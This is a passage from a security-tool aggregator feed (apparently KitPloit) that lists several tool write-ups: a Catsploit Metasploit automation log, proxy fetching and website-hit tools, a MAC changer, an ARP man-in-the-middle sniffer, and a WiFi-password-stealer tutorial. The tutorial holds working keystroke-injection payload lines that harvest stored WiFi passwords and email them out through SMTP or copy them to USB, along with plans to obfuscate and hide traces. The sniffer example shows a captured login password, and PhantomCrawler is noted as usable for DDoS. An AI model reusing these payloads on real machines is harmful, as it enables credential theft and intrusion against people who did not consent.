      β”‚ 8kmmts β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/elasticsearch/… β”‚
      β”‚ agjmma β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/windows/http/managee… β”‚
      β”‚ joglhf β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 70.0 β”‚ 60.0 β”‚ 1 β”‚ auxiliary/scanner/ssh/ssh_lo… β”‚
      β”‚ rmgrof β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/drupal_dr… β”‚
      β”‚ xuowzk β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/multi/http/struts_dm… β”‚
      β”‚ yttv51 β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
      β”‚ znv76x β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

      catsploit> scenario detail rmgrof
      ┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
      ┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃
      ┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
      β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚
      └─────────────┴──────── β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”˜

      [Steps]
      ┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
      ┃ # ┃ step ┃ params ┃
      ┑━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
      β”‚ 1 β”‚ exploit/multi/http/drupal_drupageddon β”‚ RHOSTS: 192.168.0.10 β”‚
      β”‚ β”‚ β”‚ LHOST: 192.168.10.100 β”‚
      β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜


      catsploit> attack rmgrof
      > ~> ~
      > Metasploit Console Log
      > ~
      > ~
      [+] Attack scenario succeeded!


      catsploit> exit
      Bye.

      Disclaimer

      All informations and codes are provided solely for educational purposes and/or testing your own systems.

      Contact

      For any inquiry, please contact the email address as follows:

      catsploit@nk.MitsubishiElectric.co.jp



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Valid8Proxy - Tool Designed For Fetching, Validating, And Storing Working Proxies

      By: Zion3R β€” January 6th 2024 at 11:30


      Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.


      Features:

      1. Proxy Fetching: Retrieve proxies from popular proxy sources with a single command.
      2. Proxy Validation: Efficiently validate proxies using multithreading to save time.
      3. Save to File: Save the list of validated proxies to a file for future use.

      Usage:

      1. Clone the Repository:

        git clone https://github.com/spyboy-productions/Valid8Proxy.git
      2. Navigate to the Directory:

        cd Valid8Proxy
      3. Install Dependencies:

        pip install -r requirements.txt
      4. Run the Tool:

        python Valid8Proxy.py
      5. Follow Interactive Prompts:

        • Enter the number of proxies you want to print.
        • Sit back and let Valid8Proxy fetch, validate, and display working proxies.
      6. Save to File:

        • At the end of the process, Valid8Proxy will save the list of working proxies to a file named "proxies.txt" in the same directory.
      7. Check Results:

        • Review the working proxies in the terminal with color-coded output.
        • Find the list of working proxies saved in "proxies.txt."

      If you already have proxies just want to validate usee this:

      python Validator.py

      Follow the prompts:

      Enter the path to the file containing proxies (e.g., proxy_list.txt). Enter the number of proxies you want to validate. The script will then validate the specified number of proxies using multiple threads and print the valid proxies.

      Contribution:

      Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.

      Snapshots:

      If you find this GitHub repo useful, please consider giving it a star!



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

      By: Zion3R β€” January 4th 2024 at 11:30


      PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

      Features:

      • Utilizes a list of proxy IP addresses from a specified file.
      • Supports both HTTP and HTTPS proxies.
      • Allows users to input the target website URL, proxy file path, and a static port.
      • Makes HTTP requests to the specified website using each proxy.
      • Parses HTML content to extract and visit links on the webpage.

      Usage:

      • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
      • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
      • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
      • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
      • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

      Get New Proxies with port and add in proxies.txt in this format 50.168.163.176:80
      • You can add it from here: https://free-proxy-list.net/ these free proxies are not validated some might not work so first validate these proxies before adding.

      How to Use:

      1. Clone the repository:
      git clone https://github.com/spyboy-productions/PhantomCrawler.git
      1. Install dependencies:
      pip3 install -r requirements.txt
      1. Run the script:
      python3 PhantomCrawler.py

      Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


      Snapshots:

      If you find this GitHub repo useful, please consider giving it a star!Β 



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

      By: Zion3R β€” January 2nd 2024 at 11:30


      Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

      Disclaimer: All content in this project is intended for security research purpose only.

      Β 

      Introduction

      During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

      Setup

      After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

      Prerequisites

      • Physical access to victim's computer.

      • Unlocked victim's computer.

      • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

      • Knowledge of victim's computer password for the Linux exploit.

      Requirements - What you'll need


      • Raspberry Pi Pico (RPi Pico)
      • Micro USB to USB Cable
      • Jumper Wire (optional)
      • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
      • USB flash drive (for the exploit over physical medium only)


      Note:

      • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

      • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

      • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

      Keystroke injection tool

      Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

      Keystroke injection

      The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

      Delays

      We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

      Exfiltration

      Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

      • Exfiltration over the network medium.
        • This approach was used for the Windows exploit. The whole payload can be seen here.

      • Exfiltration over a physical medium.
        • This approach was used for the Linux exploit. The whole payload can be seen here.

      Windows exploit

      In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

      Sending stolen data over email

      Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

      STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

       Note:

      • After sending data over the email, the .txt file is deleted.

      • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

      • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

      Linux exploit

      In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

      Storing stolen data to USB flash drive

      Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

      STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

      STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

      In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

      STRING echo PASSWORD | sudo -S echo

      STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

      Bash script

      In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

      echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

      where PASSWORD is your account's password and USBSTICK is the name for your USB device.

      Quick overview of the payload

      NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

      For more information about NetworkManager here is some useful links:

      Exfiltrated data formatting

      Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

      Wireless_Network_Name Password
      --------------------- --------
      WLAN1 pass1
      WLAN2 pass2
      WLAN3 pass3

      USB Mass Storage Device Problem

      One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

      ο’‘ Tip:

      • Upload your payload to RPi Pico before you connect the pins.
      • Don't solder the pins because you will probably want to change/update the payload at some point.

      Payload Writer

      When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

      python3 writer.py windows payload1.dd

      Limitations/Drawbacks

      • This pico-ducky currently works only on Windows OS.

      • This attack requires physical access to an unlocked device in order to be successfully deployed.

      • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

      • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

      • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

      • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

      • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

      • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

      • If the computer has a non-English Environment set, this exploit won't be successful.

      • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

      To-Do List

      • Fix Caps Lock bug.
      • Fix non-English Environment bug.
      • Obfuscate the command prompt.
      • Implement exfiltration over a physical medium.
      • Create a payload for Linux.
      • Encode/Encrypt exfiltrated data before sending it over email.
      • Implement indicator of successfully completed exploit.
      • Implement command history clean-up for Linux exploit.
      • Enhance the Linux exploit in order to avoid usage of sudo.


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      MacMaster - MAC Address Changer

      By: Zion3R β€” December 18th 2023 at 11:30


      MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

      Features

      • Custom MAC Address: Set a specific MAC address to your network interface.
      • Random MAC Address: Generate and set a random MAC address.
      • Reset to Original: Reset the MAC address to its original hardware value.
      • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
      • Version Information: Easily check the version of MacMaster you are using.

      Installation

      MacMaster requires Python 3.6 or later.

      1. Clone the repository:
        $ git clone https://github.com/HalilDeniz/MacMaster.git
      2. Navigate to the cloned directory:
        cd MacMaster
      3. Install the package:
        $ python setup.py install

      Usage

      $ macmaster --help         
      usage: macmaster [-h] [--interface INTERFACE] [--version]
      [--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

      MacMaster: Mac Address Changer

      options:
      -h, --help show this help message and exit
      --interface INTERFACE, -i INTERFACE
      Network interface to change MAC address
      --version, -V Show the version of the program
      --random, -r Set a random MAC address
      --newmac NEWMAC, -nm NEWMAC
      Set a specific MAC address
      --customoui CUSTOMOUI, -co CUSTOMOUI
      Set a custom OUI for the MAC address
      --reset, -rs Reset MAC address to the original value

      Arguments

      • --interface, -i: Specify the network interface.
      • --random, -r: Set a random MAC address.
      • --newmac, -nm: Set a specific MAC address.
      • --customoui, -co: Set a custom OUI for the MAC address.
      • --reset, -rs: Reset MAC address to the original value.
      • --version, -V: Show the version of the program.
      1. Set a specific MAC address:
        $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
      2. Set a random MAC address:
        $ macmaster.py -i eth0 -r
      3. Reset MAC address to its original value:
        $ macmaster.py -i eth0 -rs
      4. Set a custom OUI:
        $ macmaster.py -i eth0 -co 08:00:27
      5. Show program version:
        $ macmaster.py -V

      Replace eth0 with your desired network interface.

      Note

      You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.

      Contributing

      Contributions are welcome! To contribute to MacMaster, follow these steps:

      1. Fork the repository.
      2. Create a new branch for your feature or bug fix.
      3. Make your changes and commit them.
      4. Push your changes to your forked repository.
      5. Open a pull request in the main repository.

      Contact

      For any inquiries or further information, you can reach me through the following channels:

      Contact



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      PacketSpy - Powerful Network Packet Sniffing Tool Designed To Capture And Analyze Network Traffic

      By: Zion3R β€” December 15th 2023 at 11:30


      PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.


      Features

      • Packet Capture: Capture and analyze network packets in real-time.
      • HTTP Inspection: Inspect HTTP requests and responses for detailed analysis.
      • Raw Payload Viewing: View raw payload data for deeper investigation.
      • Device Information: Gather information about network devices, including IP addresses and MAC addresses.

      Installation

      git clone https://github.com/HalilDeniz/PacketSpy.git

      Requirements

      PacketSpy requires the following dependencies to be installed:

      pip install -r requirements.txt

      Getting Started

      To get started with PacketSpy, use the following command-line options:

      root@denizhalil:/PacketSpy# python3 packetspy.py --help                          
      usage: packetspy.py [-h] [-t TARGET_IP] [-g GATEWAY_IP] [-i INTERFACE] [-tf TARGET_FIND] [--ip-forward] [-m METHOD]

      options:
      -h, --help show this help message and exit
      -t TARGET_IP, --target TARGET_IP
      Target IP address
      -g GATEWAY_IP, --gateway GATEWAY_IP
      Gateway IP address
      -i INTERFACE, --interface INTERFACE
      Interface name
      -tf TARGET_FIND, --targetfind TARGET_FIND
      Target IP range to find
      --ip-forward, -if Enable packet forwarding
      -m METHOD, --method METHOD
      Limit sniffing to a specific HTTP method

      Examples

      1. Device Detection
      root@denizhalil:/PacketSpy# python3 packetspy.py -tf 10.0.2.0/24 -i eth0

      Device discovery
      **************************************
      Ip Address Mac Address
      **************************************
      10.0.2.1 52:54:00:12:35:00
      10.0.2.2 52:54:00:12:35:00
      10.0.2.3 08:00:27:78:66:95
      10.0.2.11 08:00:27:65:96:cd
      10.0.2.12 08:00:27:2f:64:fe

      1. Man-in-the-Middle Sniffing
      root@denizhalil:/PacketSpy# python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
      ******************* started sniff *******************

      HTTP Request:
      Method: b'POST'
      Host: b'testphp.vulnweb.com'
      Path: b'/userinfo.php'
      Source IP: 10.0.2.20
      Source MAC: 08:00:27:04:e8:82
      Protocol: HTTP
      User-Agent: b'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0'

      Raw Payload:
      b'uname=admin&pass=mysecretpassword'

      HTTP Response:
      Status Code: b'302'
      Content Type: b'text/html; charset=UTF-8'
      --------------------------------------------------

      FootNote

      Https work still in progress

      Contributing

      Contributions are welcome! To contribute to PacketSpy, follow these steps:

      1. Fork the repository.
      2. Create a new branch for your feature or bug fix.
      3. Make your changes and commit them.
      4. Push your changes to your forked repository.
      5. Open a pull request in the main repository.

      Contact

      If you have any questions, comments, or suggestions about PacketSpy, please feel free to contact me:

      License

      PacketSpy is released under the MIT License. See LICENSE for more information.



      ❌